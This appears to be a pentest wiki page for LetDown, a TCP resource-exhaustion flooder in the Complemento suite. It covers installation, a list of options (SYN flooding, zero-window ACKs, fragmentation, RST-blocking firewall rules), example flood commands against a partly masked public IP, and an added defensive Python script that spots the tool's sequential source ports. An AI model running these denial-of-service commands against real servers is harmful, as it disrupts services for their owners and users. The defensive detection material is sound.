Complemento/LetDown
Description
LetDown is a TCP flooder inspired by Fyodor's article "TCP Resource Exhaustion and Botched Disclosure" (http://insecure.org/stf/tcp-dos-attack-explained.html). It has an (experimental) userland TCP/IP stack and supports multistage payloads for complex protocols, packet fragmentation and a variable TCP window.
Installation
Download and uncompress
First of all download complemento:
$ mkdir -p /pentest/enumeration/
$ cd /pentest/enumeration/
$ wget http://downloads.sourceforge.net/project/complemento/complemento/complemento-0.7.6/complemento-0.7.6.tar.gz
$ tar xzvf complemento-0.7.6.tar.gz
$ cd complemento/letdown/
At this stage, check your version of Python:
$ python -V
Python 2.6.5
Python 2.5
If your version of Python is 2.5, you can directly compile:
$ make
Python 2.6
If you have Python 2.6, you need to apply this patch:
$ wget http://dl.dropbox.com/u/10761700/letdown-python2.6.patch
$ patch -p0 < letdown-python2.6.patch
Then you can compile:
$ make
Note
The make command will output warnings. These are only warnings, not errors, and they do not block the build.
Usage
Basic syntax
$ sudo ./letdown -d <destination ip> -p <port> [options]
Note
Note that letdown requires root privileges.
Common Options
- -d: destination IP address or DNS name (the target)
- -p: destination port
- -s: source IP address
- -x: first source port (default 1025)
- -y: last source port (default 65534)
- -l: enables infinite loop mode
- -i: network interface
- -t: sleep time in microseconds (default 10000)
- -a: maximum time in seconds to wait for responses (default 40)
Extra options
- -v: verbosity level (0=quiet, 1=normal, 2=verbose)
- -f: automagically set firewall rules to block the RST packets generated by the kernel
  - examples: -f iptables, -f blackhole (for FreeBSD)
- -L: special interaction levels with the target
  - s: SYN flooding, no 3-way handshake
  - a: send acknowledgment packets (polite mode)
  - f: send finalize packets (includes polite mode)
  - r: send reset packets (check firewall rules...)
- -W: window size for ACK packets (e.g. 0-window attack)
- -O: enable ACK fragmentation and set the fragment offset delta
- -C: fragment counter if fragmentation is enabled (default 1)
- -P: payload file (see payloads directory...)
- -M: multistage payload file (see payloads directory...)
Examples
- Generic attack
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 21
- Attack against a webserver using payload and firewall options:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -f iptables -P payloads/http.txt
- Connections from 3 ports < 1024 and with the time option:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -x 80 -y 100 -t 10000
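Seen from the target side, the defaults listed under Common Options suggest a simple check: one source address holding many established connections to one port, with source ports climbing in order from the -x value. The script below is an added example, not part of Complemento; it assumes the source port range is walked sequentially, reads text in `ss -tn` column order, and uses constructed sample data and illustrative thresholds.

```python
from collections import defaultdict

# Constructed sample in `ss -tn` column order: State Recv-Q Send-Q Local Peer.
SAMPLE = "\n".join(
    ["State Recv-Q Send-Q Local Address:Port Peer Address:Port"]
    # one source, source ports 1025..1032 in order (1025 is the -x default)
    + [f"ESTAB 0 0 203.0.113.10:80 198.51.100.7:{p}" for p in range(1025, 1033)]
    # busy but ordinary client: scattered ephemeral ports
    + [f"ESTAB 0 0 203.0.113.10:80 192.0.2.44:{p}"
       for p in (40112, 40118, 51514, 51520, 51533, 60002)]
    + ["SYN-RECV 0 0 203.0.113.10:80 192.0.2.99:1025"]
)

def parse(text):
    """Yield (local_port, peer_ip, peer_port) for established connections."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "ESTAB":
            continue  # header, half-open and closing states are ignored
        local_port = int(parts[3].rsplit(":", 1)[1])
        peer_ip, peer_port = parts[4].rsplit(":", 1)
        yield local_port, peer_ip, int(peer_port)

def longest_run(ports):
    """Length of the longest run of consecutive port numbers."""
    ports = sorted(set(ports))
    best = run = 1 if ports else 0
    for prev, cur in zip(ports, ports[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best

def suspects(text, min_conns=5, min_run=4):
    """Return sorted (peer_ip, local_port, connections, longest_run) tuples.

    Both thresholds are assumptions for this example; tune them against
    normal traffic, since NAT gateways and proxies also hold many connections.
    """
    groups = defaultdict(list)
    for local_port, peer_ip, peer_port in parse(text):
        groups[(peer_ip, local_port)].append(peer_port)
    hits = []
    for (peer_ip, local_port), ports in groups.items():
        run = longest_run(ports)
        if len(ports) >= min_conns and run >= min_run:
            hits.append((peer_ip, local_port, len(ports), run))
    return sorted(hits)

if __name__ == "__main__":
    for peer, port, count, run in suspects(SAMPLE):
        print(f"{peer} -> :{port} {count} established, {run} sequential source ports")
```

The second client in the sample has six connections but no sequential source ports, so only the first source is reported.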